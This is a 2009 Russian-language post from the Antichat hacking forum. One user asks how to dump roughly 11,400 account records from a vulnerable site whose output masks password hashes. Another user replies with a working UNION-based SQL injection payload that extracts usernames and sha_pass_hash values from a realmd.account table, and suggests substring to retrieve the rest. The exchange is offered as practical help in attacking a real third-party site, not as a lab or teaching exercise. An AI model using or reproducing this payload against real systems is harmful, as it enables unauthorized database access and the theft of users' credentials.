Показать сообщение отдельно

  #7942  
Старый 03.07.2009, 19:02
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами: 9976706

Репутация: 1934


По умолчанию

Цитата:
Сообщение от RedX  
На сайте есть 2 уязвимых скрипта, но второй доступен только после авторизации на сайте.
Я хочу собрать всю инфу из БД через дампер(в базе 11400~ записей) но если выводить через news.php то в хеше, и только в нем, выводятся только последние 8 символов остальные преобразуются в *
Вот скрин как выглядит вывод.
Прошу помочь либо разобраться как можно авторизоваться на сайте через SIPT, либо подсказать как можно обойти такой вывод..
попробуй так(но так, выведутся только несколько первых записей)
-1' union select 1,2,3,4,group_concat(concat_ws(username,0x3a,sha_p ass_hash) separator 0x20), 6 from realmd.account -- -
А чтобы остальные вывести, пробуй substring, может прокатить.
__________________
Появляюсь редко. Важные дела в реале.
 
Ответить с цитированием